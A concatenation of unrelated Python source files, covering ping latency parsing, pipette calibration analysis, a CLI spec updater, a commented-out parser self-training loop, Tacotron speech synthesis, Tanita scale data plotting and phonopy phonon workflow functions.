self.c_pexpect.sendline(s=self.PING_COMMAND+" -c "+str(ping_count))
self.c_pexpect.expect(self.CLIENT_USER+'@')
s = self.c_pexpect.before
self.pingOutputParser(s)
def pingOutputParser(self, output):
try:
lines = output.split( )
if(len(lines)>2):
last_line = lines[len(lines)-2]
columns = last_line.split('/')
rtt_avg = float(columns[1])
self.currentDelay = rtt_avg
except:
self.logger.error(self.thread_name+"Error parsing output.")
|
#############################FILE AND LABEL CHECKS############################
if not os.path.exists (__flocation__):
sys.exit("Please add "+ rawDataFolder + " folder to current folder")
if ietCalSuffix1 == "alphabet":
calFiles = alphabet
elif ietCalSuffix1 == "numbers":
calFiles = numbers
else:
sys.exit ("Please indicate how calibration suffixes are labeled and increased")
if not (os.path.exists(__flocation__ + run + "_"+ietCalSuffix1[0]+ietCalSuffix2
) or calManual[0] == "y"):
sys.exit ("Please manually enter force pipette stiffness or add calibration "+
"files to " + rawDataFolder + " folder as " + run + "_"+ietCalSuffix2+
" starting with " + ietCalSuffix1[0]+ietCalSuffix2)
########################LABEL AND INFORMATION CREATION########################
calFiles = [run + "_" + s + ietCalSuffix2 for s in calFiles]
AllForcePipette = np.zeros((cals+1, 5)).astype(str)
AllForcePipette[0,0:5]=("Calibration Values Used","Sigma from average",
"x0Sigma","x1Sigma","x2Sigma")
calGapF = calGap * calStepFactor
calEventTimesF = [i * calStepFactor for i in calEventTimes]
ietCals = -1
#######################CALIBRATION ITERATION FROM FILES#######################
while ietCals <= cals:
ietCals, fig = ietCals+1, fig + 1
if cals >= ietCals + 1:
if not os.path.exists(__flocation__+calFiles[ietCals]):
sys.exit ("please add " +calFiles[ietCals] + " to RawData File or edit "+
"number of calibration instances")
calRaw = np.asmatrix(pd.read_table(__flocation__+calFiles[ietCals],sep = "\t"))
calPosAll = calRaw[:,columnLocations["calX"]]
calTime = calRaw[:,columnLocations["calTime"]]
calT0 = calRaw[0]
calT0,calT1,calT2,calT3,calT4,calT5 = (
np.where(calTime>calT0)[0][0],
np.where(calT0+calTime>(calEventTimesF[0]-calGapF))[0][0],
np.where(calT0+calTime>(calEventTimesF[1]+calGapF))[0][0],
np.where(calT0+calTime>(calEventTimesF[2]-calGapF))[0][0],
np.where(calT0+calTime>(calEventTimesF[2]+calGapF))[0][0],
np.where(calT0+calTime>calEventTimesF[3]-calGapF)[0][0])
calX0All, calX1All, calX2All = (
np.arange(calT0,calT1,1),
np.arange(calT2,calT3,1),
np.arange(calT4,calT5,1))
calX0All,calX1All,calX2All = (
calPosAll[[calX0All]],
calPosAll[[calX1All]],
calPosAll[[calX2All]])
calX0 = np.mean(calX0All)
calX1, calX2 = np.mean(calX1All)-calX0, np.mean(calX2All)-calX0
if calShowPlot == "y":
plt.figure(fig)
plt.title(str(calFiles[ietCals]))
plt.plot(calPosAll),plt.plot(calX0All),plt.plot(calX1All),
plt.plot(calX2All)
forcePipStr = calPipette * (calX2-calX1)/(calX1)
####################CONSOLIDATES CALIBRATION INSTANCE DATA####################
AllForcePipette[ietCals+1,(0,2,3,4)] = (forcePipStr,
np.std(calX0All),
np.std(calX1All),
np.std(calX2All))
####################CONSOLIDATES AND ANALYZES CALIBRATION#####################
AllForcePipetteUncut = AllForcePipette
AllForcePipetteUncut [1:,1] = (abs(AllForcePipetteUncut[1:,0].astype(float) -
np.mean(AllForcePipetteUncut[1:,0].astype(float)))/
np.std(AllForcePipetteUncut[1:,0].astype(float)))
AllForcePipette = np.delete(AllForcePipette,calRejMan,axis=0)
calN = len(AllForcePipette)-1
AForcePipette = np.mean((AllForcePipette[1:calN+1,0]).astype(float))
AForcePipetteSterr = np.std(AllForcePipette[1:calN+1,0].astype(float))/(
np.size(AllForcePipette[1:calN+1,0])**0.5)
AllForcePipette[1:,1] = (abs(AllForcePipette[1:,0].astype(float) -
np.mean(AllForcePipette[1:,0].astype(float)))/
np.std(AllForcePipette[1:,0].astype(float)))
calRej = calRejMan
AllForcePipetteUncut[0,0] = "All Calibrations Uncut"
#############CALCULATES DATA QUALITY AND ATTEMPTS TO MAKE IT GOOD#############
if calAutoAgree == "y":
while AForcePipetteSterr/AForcePipette > qualityParameters[1][0] and (
calN > qualityN["N"]):
calOutlier = (np.where((AllForcePipette[:,1]) == (max(AllForcePipette[
1:,1].astype(float))).astype(str)))
calRej = calRej + [np.where(AllForcePipetteUncut[1:,0].astype(
float)==AllForcePipette[[calOutlier[0][0]],0].astype(float)[0])[0][0]+1]
AllForcePipette = np.delete(AllForcePipette,calOutlier,axis=0)
calN = calN - 1
AForcePipette = np.mean((AllForcePipette[1:,0]).astype(float))
AForcePipetteSterr = (np.std(AllForcePipette[1:,0].astype(float))/(
np.size(AllForcePipette[1:,0])**0.5))
AllForcePipette[1:,1] = ((abs(AllForcePipette[1:,0].astype(float)-
AForcePipette.astype(float)))/
np.std(AllForcePipette[1:,0].astype(float)))
if calN >= qualityN["N"] and any(AForcePipetteSterr/AForcePipette < (
np.asarray(qualityParameters[1][:]))):
calQuality = qualityParameters[0][max(np.where(AForcePipetteSterr/
AForcePipette<(np.asarray(qualityParameters[1][:])))[0])]
else:
calQuality = qualityParameters[2][0]
########################PRINTS CALIBRATION INFORMATION########################
print (runName + " Force Pipette equal to " + str(round(AForcePipette,2)))
print ("Calibrations were of " + calQuality + " quality")
if len (calRej) == 0:
print ("No Calibrations were rejected")
else:
print ("Calibrations " + str(calRej) + " were rejected") |
<gh_stars>1-10
# -*- coding: utf-8 -*-
import os
import sys
import json
import traceback
import six
import yaml
import requests
from scalrctl import click, defaults, settings, commands, utils
__author__ = '<NAME>, <NAME>'
def _get_spec_path(api_level, extension):
return os.path.join(defaults.CONFIG_DIRECTORY,
'{}.{}'.format(api_level, extension))
def _is_spec_exists(api_level, extension):
return os.path.exists(_get_spec_path(api_level, extension))
def _load_yaml_spec(api_level):
spec_url = "{0}://{1}/api/{2}.{3}.yml".format(settings.API_SCHEME,
settings.API_HOST,
api_level,
settings.API_VERSION)
try:
resp = requests.get(spec_url, verify=settings.SSL_VERIFY_PEER)
resp.raise_for_status()
if resp.status_code != 200:
raise requests.exceptions.HTTPError(
"Expected code: 200, got: {}".format(resp.status_code))
return resp.text
except requests.exceptions.SSLError as e:
import ssl
if 'CertificateError' in str(e):
sni_supported = None
try:
from OpenSSL._util import lib as _lib
if _lib.Cryptography_HAS_TLSEXT_HOSTNAME:
sni_supported = True
except ImportError:
sni_supported = False
if not sni_supported:
errmsg = "\nError: Your Python version %s does not support SNI. " \
"This can be resolved by upgrading Python to version 2.7.9 or " \
"by installing pyOpenSSL>=17.3.0. More info in Requests FAQ: " \
"http://docs.python-requests.org/en/master/community/faq/#what-are-hostname-doesn-t-match-errors" \
" \nIf you are having problems installing pyOpenSSL try to upgrade pip first." % sys.version[:5]
click.echo(errmsg)
sys.exit()
raise
def _read_spec(spec_path):
text = None
if os.path.exists(spec_path):
with open(spec_path, "r") as fp:
text = fp.read()
return text
def _write_spec(spec_path, text):
with open(spec_path, "w") as fp:
fp.write(text)
def _update_spec(api_level):
"""
Downloads yaml spec and converts it to JSON
Both files are stored in configuration directory.
"""
try:
try:
yaml_spec_text = _load_yaml_spec(api_level)
except requests.exceptions.RequestException as e:
raise Exception("Can\'t load spec file. Request failed. {}".format(str(e)))
try:
struct = yaml.safe_load(yaml_spec_text)
json_spec_text = json.dumps(struct)
except (KeyError, TypeError, yaml.YAMLError) as e:
six.reraise(type(e), "Swagger specification is not valid:\n{}"
.format(traceback.format_exc()))
yaml_spec_path = _get_spec_path(api_level, 'yaml')
json_spec_path = _get_spec_path(api_level, 'json')
old_yaml_spec_text = _read_spec(yaml_spec_path)
# update yaml spec
if yaml_spec_text != old_yaml_spec_text:
_write_spec(yaml_spec_path, yaml_spec_text)
# update json spec and routes
_write_spec(json_spec_path, json_spec_text)
return True, None
except Exception as e:
return False, str(e) or 'Unknown reason'
class UpdateScalrCTL(commands.BaseAction):
def run(self, *args, **kwargs):
update()
def get_description(self):
return "Fetch new API specification if available."
def is_update_required():
"""
Determine if spec update is needed.
"""
# prevent from running 'update' more than once
if 'update' in sys.argv or 'configure' in sys.argv:
return False
else:
exists = [_is_spec_exists(api, 'yaml') and
_is_spec_exists(api, 'json') for api in defaults.API_LEVELS]
return not all(exists)
def update():
"""
Update spec for all available APIs.
"""
amount = len(defaults.API_LEVELS)
for index, api_level in enumerate(defaults.API_LEVELS, 1):
click.echo('[{}/{}] Updating specifications for {} API ... '
.format(index, amount, api_level), nl=False)
with utils._spinner():
success, fail_reason = _update_spec(api_level)
if success:
click.secho('Done', fg='green')
else:
click.secho('Failed: {}'.format(fail_reason), fg='red')
|
# def self_training(args):
# """Perform self-training
#
# First load decoding results on disjoint data
# also load pre-trained model and perform supervised
# training on both existing training data and the
# decoded results
# """
#
# print('load pre-trained model from [%s]' % args.load_model, file=sys.stderr)
# params = torch.load(args.load_model, map_location=lambda storage, loc: storage)
# vocab = params['vocab']
# transition_system = params['transition_system']
# saved_args = params['args']
# saved_state = params['state_dict']
#
# # transfer arguments
# saved_args.cuda = args.cuda
# saved_args.save_to = args.save_to
# saved_args.train_file = args.train_file
# saved_args.unlabeled_file = args.unlabeled_file
# saved_args.dev_file = args.dev_file
# saved_args.load_decode_results = args.load_decode_results
# args = saved_args
#
# update_args(args, arg_parser)
#
# model = Parser(saved_args, vocab, transition_system)
# model.load_state_dict(saved_state)
#
# if args.cuda: model = model.cuda()
# model.train()
# optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
#
# print('load unlabeled data [%s]' % args.unlabeled_file, file=sys.stderr)
# unlabeled_data = Dataset.from_bin_file(args.unlabeled_file)
#
# print('load decoding results of unlabeled data [%s]' % args.load_decode_results, file=sys.stderr)
# decode_results = pickle.load(open(args.load_decode_results))
#
# labeled_data = Dataset.from_bin_file(args.train_file)
# dev_set = Dataset.from_bin_file(args.dev_file)
#
# print('Num. examples in unlabeled data: %d' % len(unlabeled_data), file=sys.stderr)
# assert len(unlabeled_data) == len(decode_results)
# self_train_examples = []
# for example, hyps in zip(unlabeled_data, decode_results):
# if hyps:
# hyp = hyps[0]
# sampled_example = Example(idx='self_train-%s' % example.idx,
# src_sent=example.src_sent,
# tgt_code=hyp.code,
# tgt_actions=hyp.action_infos,
# tgt_ast=hyp.tree)
# self_train_examples.append(sampled_example)
# print('Num. self training examples: %d, Num. labeled examples: %d' % (len(self_train_examples), len(labeled_data)),
# file=sys.stderr)
#
# train_set = Dataset(examples=labeled_data.examples + self_train_examples)
#
# print('begin training, %d training examples, %d dev examples' % (len(train_set), len(dev_set)), file=sys.stderr)
# print('vocab: %s' % repr(vocab), file=sys.stderr)
#
# epoch = train_iter = 0
# report_loss = report_examples = 0.
# history_dev_scores = []
# num_trial = patience = 0
# while True:
# epoch += 1
# epoch_begin = time.time()
#
# for batch_examples in train_set.batch_iter(batch_size=args.batch_size, shuffle=True):
# batch_examples = [e for e in batch_examples if len(e.tgt_actions) <= args.decode_max_time_step]
#
# train_iter += 1
# optimizer.zero_grad()
#
# loss = -model.score(batch_examples)
# # print(loss.data)
# loss_val = torch.sum(loss).data[0]
# report_loss += loss_val
# report_examples += len(batch_examples)
# loss = torch.mean(loss)
#
# loss.backward()
#
# # clip gradient
# if args.clip_grad > 0.:
# grad_norm = torch.nn.utils.clip_grad_norm(model.parameters(), args.clip_grad)
#
# optimizer.step()
#
# if train_iter % args.log_every == 0:
# print('[Iter %d] encoder loss=%.5f' %
# (train_iter,
# report_loss / report_examples),
# file=sys.stderr)
#
# report_loss = report_examples = 0.
#
# print('[Epoch %d] epoch elapsed %ds' % (epoch, time.time() - epoch_begin), file=sys.stderr)
# # model_file = args.save_to + '.iter%d.bin' % train_iter
# # print('save model to [%s]' % model_file, file=sys.stderr)
# # model.save(model_file)
#
# # perform validation
# print('[Epoch %d] begin validation' % epoch, file=sys.stderr)
# eval_start = time.time()
# eval_results = evaluation.evaluate(dev_set.examples, model, args, verbose=True)
# dev_acc = eval_results['accuracy']
# print('[Epoch %d] code generation accuracy=%.5f took %ds' % (epoch, dev_acc, time.time() - eval_start), file=sys.stderr)
# is_better = history_dev_scores == [] or dev_acc > max(history_dev_scores)
# history_dev_scores.append(dev_acc)
#
# if is_better:
# patience = 0
# model_file = args.save_to + '.bin'
# print('save currently the best model ..', file=sys.stderr)
# print('save model to [%s]' % model_file, file=sys.stderr)
# model.save(model_file)
# # also save the optimizers' state
# torch.save(optimizer.state_dict(), args.save_to + '.optim.bin')
# elif epoch == args.max_epoch:
# print('reached max epoch, stop!', file=sys.stderr)
# exit(0)
# elif patience < args.patience:
# patience += 1
# print('hit patience %d' % patience, file=sys.stderr)
#
# if patience == args.patience:
# num_trial += 1
# print('hit #%d trial' % num_trial, file=sys.stderr)
# if num_trial == args.max_num_trial:
# print('early stop!', file=sys.stderr)
# exit(0)
#
# # decay lr, and restore from previously best checkpoint
# lr = optimizer.param_groups[0]['lr'] * args.lr_decay
# print('load previously best model and decay learning rate to %f' % lr, file=sys.stderr)
#
# # load model
# params = torch.load(args.save_to + '.bin', map_location=lambda storage, loc: storage)
# model.load_state_dict(params['state_dict'])
# if args.cuda: model = model.cuda()
#
# # load optimizers
# if args.reset_optimizer:
# print('reset optimizer', file=sys.stderr)
# optimizer = torch.optim.Adam(model.inference_model.parameters(), lr=lr)
# else:
# print('restore parameters of the optimizers', file=sys.stderr)
# optimizer.load_state_dict(torch.load(args.save_to + '.optim.bin'))
#
# # set new lr
# for param_group in optimizer.param_groups:
# param_group['lr'] = lr
#
# # reset patience
# patience = 0
#
|
"""ESpeak like synthesize to be used with aeneas."""
import argparse
import os
import time
import tensorflow as tf
from hparams import hparams
from infolog import log
from tacotron.synthesizer import Synthesizer
from tqdm import tqdm
def prepare_run(args):
modified_hp = hparams.parse(args.hparams)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
run_name = args.name or args.tacotron_name or args.model
taco_checkpoint = os.path.join('logs-' + run_name, 'taco_' + args.checkpoint)
run_name = args.name or args.wavenet_name or args.model
wave_checkpoint = os.path.join('logs-' + run_name, 'wave_' + args.checkpoint)
return taco_checkpoint, wave_checkpoint, modified_hp
def get_sentences(args):
if args.text_list != '':
sentences = args.text_list.splitlines()
elif args.text != '':
sentences = [args.text.replace('\n', ' ')]
else:
sentences = hparams.sentences
return sentences
def run_eval(args, checkpoint_path, output_dir, hparams, sentences):
eval_dir = os.path.join(output_dir, 'eval')
log_dir = os.path.join(output_dir, 'logs-eval')
if args.model == 'Tacotron-2':
assert os.path.normpath(eval_dir) == os.path.normpath(args.mels_dir)
#Create output path if it doesn't exist
os.makedirs(eval_dir, exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
os.makedirs(os.path.join(log_dir, 'wavs'), exist_ok=True)
os.makedirs(os.path.join(log_dir, 'plots'), exist_ok=True)
synth = Synthesizer()
synth.load(checkpoint_path, hparams)
#Set inputs batch wise
sentences = [sentences[i: i+hparams.tacotron_synthesis_batch_size] for i in range(0, len(sentences), hparams.tacotron_synthesis_batch_size)]
#log('Starting Synthesis')
with open(os.path.join(eval_dir, 'map.txt'), 'w') as file:
for i, texts in enumerate(tqdm(sentences)):
start = time.time()
basenames = ['batch_{}_sentence_{}'.format(i, j) for j in range(len(texts))]
mel_filenames, speaker_ids = synth.synthesize(texts, basenames, eval_dir, log_dir, None)
for elems in zip(texts, mel_filenames, speaker_ids):
file.write('|'.join([str(x) for x in elems]) + '\n')
#log('synthesized mel spectrograms at {}'.format(eval_dir))
return eval_dir
def tacotron_synthesize(args, hparams, checkpoint, sentences=None):
output_dir = 'tacotron_' + args.output_dir
try:
checkpoint_path = tf.train.get_checkpoint_state(checkpoint).model_checkpoint_path
log('loaded model at {}'.format(checkpoint_path))
except:
raise RuntimeError('Failed to load checkpoint at {}'.format(checkpoint))
if hparams.tacotron_synthesis_batch_size < hparams.tacotron_num_gpus:
raise ValueError('Defined synthesis batch size {} is smaller than minimum required {} (num_gpus)! Please verify your synthesis batch size choice.'.format(
hparams.tacotron_synthesis_batch_size, hparams.tacotron_num_gpus))
if hparams.tacotron_synthesis_batch_size % hparams.tacotron_num_gpus != 0:
raise ValueError('Defined synthesis batch size {} is not a multiple of {} (num_gpus)! Please verify your synthesis batch size choice!'.format(
hparams.tacotron_synthesis_batch_size, hparams.tacotron_num_gpus))
return run_eval(args, checkpoint_path, output_dir, hparams, sentences)
def main():
accepted_modes = ['eval']
parser = argparse.ArgumentParser()
parser.add_argument('--checkpoint', default='pretrained/', help='Path to model checkpoint')
parser.add_argument('--hparams', default='',
help='Hyperparameter overrides as a comma-separated list of name=value pairs')
parser.add_argument('--name', help='Name of logging directory if the two models were trained together.')
parser.add_argument('--tacotron_name', help='Name of logging directory of Tacotron. If trained separately')
parser.add_argument('--wavenet_name', help='Name of logging directory of WaveNet. If trained separately')
parser.add_argument('--model', default='Tacotron')
parser.add_argument('--input_dir', default='training_data/', help='folder to contain inputs sentences/targets')
parser.add_argument('--mels_dir', default='tacotron_output/eval/', help='folder to contain mels to synthesize audio from using the Wavenet')
parser.add_argument('--output_dir', default='output/', help='folder to contain synthesized mel spectrograms')
parser.add_argument('--mode', default='eval', help='mode of run: can be one of {}'.format(accepted_modes))
parser.add_argument('--GTA', default='False', help='Ground truth aligned synthesis, defaults to True, only considered in synthesis mode')
parser.add_argument('--text_list', default='', help='Sentences to separated by new lines. Valid if mode=eval')
parser.add_argument("text", nargs='?', help='text to be synthesized')
args = parser.parse_args()
taco_checkpoint, wave_checkpoint, hparams = prepare_run(args)
sentences = get_sentences(args)
_ = tacotron_synthesize(args, hparams, taco_checkpoint, sentences)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import (
absolute_import, division, print_function, unicode_literals)
import argparse
from datetime import datetime
import os
import re
from io import BytesIO
import matplotlib
matplotlib.use('Agg') # requied to work in virtualenv
import matplotlib.pyplot as plt
line_regex = re.compile( # pylint: disable=invalid-name
r'DT,"(?P<date>[0-9/]+)",Ti,"(?P<time>[0-9:]+)",Bt,(?P<body_type>[02]),GE,'
r'(?P<gender>[12]),AG,(?P<age>\d+),Hm,(?P<height>\d+\.\d),AL,'
r'(?P<activity>[123]),Wk,(?P<weight>\d+\.\d),MI,(?P<bmi>\d+\.\d),FW,'
r'(?P<fat>\d+\.\d),Fr,(?P<fat_rarm>\d+\.\d),Fl,(?P<fat_larm>\d+\.\d),FR,'
r'(?P<fat_rleg>\d+\.\d),FL,(?P<fat_lleg>\d+\.\d),FT,'
r'(?P<fat_trunk>\d+\.\d),mW,(?P<muscle>\d+\.\d),mr,'
r'(?P<muscle_rarm>\d+\.\d),ml,(?P<muscle_larm>\d+\.\d),mR,'
r'(?P<muscle_rleg>\d+\.\d),mL,(?P<muscle_lleg>\d+\.\d),mT,'
r'(?P<muscle_trunk>\d+\.\d),bW,(?P<bones>\d+\.\d),IF,(?P<visceral>\d+),rD,'
r'(?P<calories>\d+),rA,(?P<meta_age>\d+),ww,(?P<water>\d+\.\d)')
def get_args():
parser = argparse.ArgumentParser(
description='Process data from Tanita BC-601 Body Composition '
'Monitor.')
parser.add_argument('path', help="path to the input file")
parser.add_argument('-o', '--output', default="tanita_report.pdf",
help="output file")
return parser.parse_args()
def parse_line(line):
vals = line_regex.search(line).groupdict()
vals['date_time'] = datetime.strptime(
'{} {}'.format(vals.pop('date'), vals.pop('time')),
"%d/%m/%Y %H:%M:%S")
vals['body_type'] = 'standard' if vals['body_type'] == 0 else 'athletic'
vals['gender'] = 'male' if vals['gender'] == 1 else 'female'
return vals
def plot_dates_graph(dates, data):
plt.xticks(rotation=90)
for entry in data:
plt.plot_date(dates, entry['values'], 'o-', label=entry['label'])
plt.legend(loc='upper center', ncol=3, bbox_to_anchor=(0.5, 1.05))
plt.tight_layout()
graph_png = BytesIO()
plt.savefig(graph_png, format='png')
graph_png.seek(0) # rewind the data
plt.clf()
return graph_png
def main():
args = get_args()
if not os.path.isfile(args.path):
raise IOError("File '{}' does not exist.".format(args.path))
parsed = []
with open(args.path) as f_input:
for line in f_input.readlines():
parsed.append(parse_line(line))
collected = {}
for measure in parsed:
for key, value in measure.items():
try:
collected[key].append(value)
except KeyError:
collected[key] = [value]
dates = matplotlib.dates.date2num(collected['date_time'])
fat_png = plot_dates_graph(dates, [
{'values': collected['fat'], 'label': 'Total'},
{'values': collected['fat_larm'], 'label': 'Left arm'},
{'values': collected['fat_rarm'], 'label': 'Right arm'},
{'values': collected['fat_lleg'], 'label': 'Left leg'},
{'values': collected['fat_rleg'], 'label': 'Right leg'},
{'values': collected['fat_trunk'], 'label': 'Trunk'},
])
open('fat.png', 'w').write(fat_png.read())
muscle_png = plot_dates_graph(dates, [
{'values': collected['muscle'], 'label': 'Total'},
{'values': collected['muscle_larm'], 'label': 'Left arm'},
{'values': collected['muscle_rarm'], 'label': 'Right arm'},
{'values': collected['muscle_lleg'], 'label': 'Left leg'},
{'values': collected['muscle_rleg'], 'label': 'Right leg'},
{'values': collected['muscle_trunk'], 'label': 'Trunk'},
])
open('muscle.png', 'w').write(muscle_png.read())
if __name__ == '__main__':
main()
|
import numpy as np
from aiida.engine import calcfunction
from aiida.plugins import DataFactory
from phonopy.structure.atoms import PhonopyAtoms
from aiida.orm import Bool, Str, Int, load_node
@calcfunction
def get_phonon_setting_info(phonon_settings,
structure,
symmetry_tolerance,
displacement_dataset=None):
return_vals = {}
ph_settings = {}
ph_settings.update(phonon_settings.get_dict())
dim = ph_settings['supercell_matrix']
if len(np.ravel(dim)) == 3:
smat = np.diag(dim)
else:
smat = np.array(dim)
if not np.issubdtype(smat.dtype, np.integer):
raise TypeError("supercell_matrix is not integer matrix.")
else:
ph_settings['supercell_matrix'] = smat.tolist()
if 'mesh' not in ph_settings:
ph_settings['mesh'] = 100.0
if 'distance' not in ph_settings:
ph_settings['distance'] = 0.01
tolerance = symmetry_tolerance.value
ph_settings['symmetry_tolerance'] = tolerance
ph = get_phonopy_instance(structure, ph_settings, {})
ph_settings['primitive_matrix'] = ph.primitive_matrix
ph_settings['symmetry'] = {
'number': ph.symmetry.dataset['number'],
'international': ph.symmetry.dataset['international']}
if displacement_dataset is None:
ph.generate_displacements(distance=ph_settings['distance'])
else:
ph.dataset = displacement_dataset.get_dict()
ph_settings['displacement_dataset'] = ph.dataset
settings = DataFactory('dict')(dict=ph_settings)
settings.label = 'phonon_setting_info'
return_vals['phonon_setting_info'] = settings
# Supercells and primitive cell
for i, scell in enumerate(ph.supercells_with_displacements):
structure = phonopy_atoms_to_structure(scell)
label = "supercell_%03d" % (i + 1)
structure.label = "%s %s" % (
structure.get_formula(mode='hill_compact'), label)
return_vals[label] = structure
supercell_structure = phonopy_atoms_to_structure(ph.supercell)
supercell_structure.label = "%s %s" % (
supercell_structure.get_formula(mode='hill_compact'), 'supercell')
return_vals['supercell'] = supercell_structure
primitive_structure = phonopy_atoms_to_structure(ph.primitive)
primitive_structure.label = "%s %s" % (
primitive_structure.get_formula(mode='hill_compact'), 'primitive cell')
return_vals['primitive'] = primitive_structure
return return_vals
@calcfunction
def check_imported_supercell_structure(supercell_ref,
supercell_calc,
symmetry_tolerance):
symprec = symmetry_tolerance.value
cell_diff = np.subtract(supercell_ref.cell, supercell_calc.cell)
if (np.abs(cell_diff) > symprec).any():
succeeded = Bool(False)
succeeded.label = "False"
return succeeded
positions_ref = [site.position for site in supercell_ref.sites]
positions_calc = [site.position for site in supercell_calc.sites]
diff = np.subtract(positions_ref, positions_calc)
diff -= np.rint(diff)
dist = np.sqrt(np.sum(np.dot(diff, supercell_ref.cell) ** 2, axis=1))
if (dist > symprec).any():
succeeded = Bool(False)
succeeded.label = "False"
return succeeded
succeeded = Bool(True)
succeeded.label = "True"
return succeeded
@calcfunction
def get_force_sets(**forces_dict):
forces = []
energies = []
for i in range(len(forces_dict)):
label = "forces_%03d" % (i + 1)
if label in forces_dict:
forces.append(forces_dict[label].get_array('final'))
label = "misc_%03d" % (i + 1)
if label in forces_dict:
energies.append(
forces_dict[label]['total_energies']['energy_no_entropy'])
assert len(forces) == sum(['forces' in k for k in forces_dict])
force_sets = DataFactory('array')()
force_sets.set_array('force_sets', np.array(forces))
if energies:
force_sets.set_array('energies', np.array(energies))
force_sets.label = 'force_sets'
return force_sets
@calcfunction
def get_nac_params(born_charges, epsilon, nac_structure, **params):
"""Obtain Born effective charges and dielectric constants in primitive cell
When Born effective charges and dielectric constants are calculated within
phonopy workchain, those values are calculated in the primitive cell.
However using immigrant, the cell may not be primitive cell and can be
unit cell. In this case, conversion of data is necessary. This conversion
needs information of the structure where those values were calcualted and
the target primitive cell structure.
Two kargs parameters
primitive : StructureData
symmetry_tolerance : Float
"""
from phonopy.structure.symmetry import symmetrize_borns_and_epsilon
borns = born_charges.get_array('born_charges')
eps = epsilon.get_array('epsilon')
nac_cell = phonopy_atoms_from_structure(nac_structure)
kargs = {}
if 'symmetry_tolerance' in params:
kargs['symprec'] = params['symmetry_tolerance'].value
if 'primitive' in params:
pcell = phonopy_atoms_from_structure(params['primitive'])
kargs['primitive'] = pcell
borns_, epsilon_ = symmetrize_borns_and_epsilon(
borns, eps, nac_cell, **kargs)
nac_params = DataFactory('array')()
nac_params.set_array('born_charges', borns_)
nac_params.set_array('epsilon', epsilon_)
nac_params.label = 'born_charges & epsilon'
return nac_params
@calcfunction
def get_force_constants(structure, phonon_settings, force_sets):
params = {}
phonon = get_phonopy_instance(structure, phonon_settings, params)
phonon.dataset = phonon_settings['displacement_dataset']
phonon.forces = force_sets.get_array('force_sets')
phonon.produce_force_constants()
force_constants = DataFactory('array')()
force_constants.set_array('force_constants', phonon.force_constants)
force_constants.set_array('p2s_map', phonon.primitive.p2s_map)
force_constants.label = 'force_constants'
return force_constants
@calcfunction
def get_phonon(structure, phonon_settings, force_constants, **params):
phonon_settings_dict = phonon_settings.get_dict()
ph = get_phonopy_instance(structure, phonon_settings_dict, params)
ph.force_constants = force_constants.get_array('force_constants')
mesh = phonon_settings_dict['mesh']
# Mesh
total_dos, pdos, thermal_properties = get_mesh_property_data(ph, mesh)
# Band structure
bs = get_bands_data(ph)
return {'dos': total_dos,
'pdos': pdos,
'thermal_properties': thermal_properties,
'band_structure': bs}
@calcfunction
def get_data_from_node_id(node_id):
n = load_node(node_id.value)
if 'structure' in n.inputs:
cell = phonopy_atoms_from_structure(n.inputs.structure)
structure = phonopy_atoms_to_structure(cell)
else:
raise RuntimeError("Crystal structure could not be found.")
if 'born_charges' in n.outputs and 'dielectrics' in n.outputs:
born = DataFactory('array')()
born.set_array(
'born_charges', n.outputs.born_charges.get_array('born_charges'))
born.label = 'born_charges'
epsilon = DataFactory('array')()
epsilon.set_array(
'epsilon', n.outputs.dielectrics.get_array('epsilon'))
epsilon.label = 'epsilon'
return {'born_charges': born, 'dielectrics': epsilon,
'structure': structure}
elif 'forces' in n.outputs:
forces = DataFactory('array')()
forces.set_array('final', n.outputs.forces.get_array('final'))
forces.label = 'forces'
return {'forces': forces, 'structure': structure}
else:
raise RuntimeError("Forces or NAC params were not found.")
def get_mesh_property_data(ph, mesh):
ph.set_mesh(mesh)
ph.run_total_dos()
dos = get_total_dos(ph.get_total_dos_dict())
ph.run_thermal_properties()
tprops = get_thermal_properties(ph.get_thermal_properties_dict())
ph.set_mesh(mesh, is_eigenvectors=True, is_mesh_symmetry=False)
ph.run_projected_dos()
pdos = get_projected_dos(ph.get_projected_dos_dict())
return dos, pdos, tprops
def get_total_dos(total_dos):
dos = DataFactory('array.xy')()
dos.set_x(total_dos['frequency_points'], 'Frequency', 'THz')
dos.set_y(total_dos['total_dos'], 'Total DOS', '1/THz')
dos.label = 'Total DOS'
return dos
def get_projected_dos(projected_dos):
pdos = DataFactory('array.xy')()
pdos_list = [pd for pd in projected_dos['projected_dos']]
pdos.set_x(projected_dos['frequency_points'], 'Frequency', 'THz')
pdos.set_y(pdos_list,
['Projected DOS', ] * len(pdos_list),
['1/THz', ] * len(pdos_list))
pdos.label = 'Projected DOS'
return pdos
def get_thermal_properties(thermal_properties):
tprops = DataFactory('array.xy')()
tprops.set_x(thermal_properties['temperatures'], 'Temperature', 'K')
tprops.set_y([thermal_properties['free_energy'],
thermal_properties['entropy'],
thermal_properties['heat_capacity']],
['Helmholtz free energy', 'Entropy', 'Cv'],
['kJ/mol', 'J/K/mol', 'J/K/mol'])
tprops.label = 'Thermal properties'
return tprops
def get_bands_data(ph):
ph.auto_band_structure()
labels = [x.replace('$', '').replace('\\', '').replace('mathrm{', '').replace('}', '').upper()
for x in ph.band_structure.labels]
frequencies = ph.band_structure.frequencies
qpoints = ph.band_structure.qpoints
path_connections = ph.band_structure.path_connections
label = "%s (%d)" % (ph.symmetry.dataset['international'],
ph.symmetry.dataset['number'])
return get_bands(qpoints, frequencies, labels, path_connections,
label=label)
def get_bands(qpoints, frequencies, labels, path_connections, label=None):
qpoints_list = list(qpoints[0])
frequencies_list = list(frequencies[0])
labels_list = [(0, labels[0]), ]
label_index = 1
for pc, qs, fs in zip(path_connections[:-1], qpoints[1:], frequencies[1:]):
if labels[label_index] == 'GAMMA' and pc:
labels_list.append((len(qpoints_list) - 1, labels[label_index]))
if label_index < len(labels):
labels_list.append((len(qpoints_list), labels[label_index]))
label_index += 1
qpoints_list += list(qs)
frequencies_list += list(fs)
elif pc:
labels_list.append((len(qpoints_list) - 1, labels[label_index]))
label_index += 1
